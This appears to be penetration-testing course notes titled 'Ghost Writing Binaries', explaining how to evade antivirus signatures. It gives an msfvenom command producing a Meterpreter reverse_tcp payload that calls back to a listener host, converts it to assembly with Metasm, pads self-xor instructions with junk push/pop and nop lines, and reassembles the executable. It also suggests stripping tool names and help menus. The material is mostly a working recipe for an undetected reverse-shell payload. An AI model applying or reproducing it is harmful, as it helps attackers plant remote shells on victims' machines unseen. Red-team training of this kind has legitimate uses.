Ghost Writing Binaries

• Changing of the Assembly source code, to alter the well known signature used by anti-virus engines.

• Overview

Create a .exe
Convert it to .asm 
Edit the .asm file
Convert back to .exe 

• Most of the time you dont want to alter the functionality of the binary.

• Some additional (outside of Ghostwriting) things that can help with evading signatures are:

Removing the Help menu of a tool
Removing instances of the tool name in the source code

Ghost Writing How To

• Generate a msfvenom payload for example

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.12 LPORT=4444 -f raw -o payload.raw --platform windows -a x86

• Now that you have a raw payload, convert it to ASCII asm source

• The Metasm script is a great option to accomplish this

• https://github.com/jjyg/metasm

ruby /opt/metasm/samples/disassemble.rb payload.raw > payload.asm

• Now open the file in gedit

Obfuscation of ASM File

• At the very top of the file add:

.section '.text' rwx
.entrypoint

• Now start by finding any instance of xor where a register is xor (ed) against itself.

• When something is xor against it self, it will clear the register to a value of 0

• For example look for something like this

xor eax, eax

• Because the normal code execution will clear out any value in eax we can add additional instructions before the xor

• Thus we can add this in before the xor statement

push eax
pop eax
xor eax, eax

• Also feel free to add in other additional irrelevant instructions before an xor occurs. Remember only where an operand is xor with itself.

• Also can add nop instructions into the program at the correct places.

• Testing is your best friend here

Convert Back

• Once you are done altering the asm it is time to convert it back to an exe

ruby /opt/metasm/samples/peencode.rb payload.asm -o payload.exe